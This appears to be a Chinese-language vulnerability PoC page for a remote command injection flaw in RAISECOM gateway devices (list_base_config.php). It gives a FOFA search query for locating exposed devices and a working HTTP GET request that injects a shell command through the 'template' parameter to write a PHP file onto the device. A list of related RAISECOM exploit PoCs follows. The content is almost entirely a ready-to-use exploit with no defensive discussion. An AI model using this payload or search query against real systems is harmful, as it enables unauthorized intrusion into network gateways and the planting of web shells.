RAISECOM网关设备list_base_config.php存在远程命令执行漏洞

漏洞描述

PoC代码

# RAISECOM网关设备list_base_config.php存在远程命令执行漏洞



## fofa



```yaml

body="/images/raisecom/back.gif"

```



## poc



```java

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo.php%60 HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36



```



文件路径`http://ip/tmp/info.php`

相关漏洞推荐

• POC CVE-2024-7120: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection
• POC raisecom-gateway-list-base-config-rce: 瑞斯康达RAISECOM网关设备list_base_config.php远程命令执行漏洞
• POC raisecom-rce: Raisecom Gateway vpn_template_style.php - Remote Command Execution
• RAISECOM网关设备 main.asp 未授权访问漏洞
• RAISECOM网关设备 list_service_manage.php 远程命令执行漏洞
• RAISECOM网关 vpn_template_style.php 命令注入漏洞
• RAISECOM网关 list_vpn_web_custom.php 命令注入漏洞
• 瑞斯康达多业务智能网关 list_base_config.php 远程命令注入漏洞
• RAISECOM网关设备 list_base_config.php 远程命令执行漏洞
• 瑞斯康达多业务智能网关list_base_config.php远程命令执行漏洞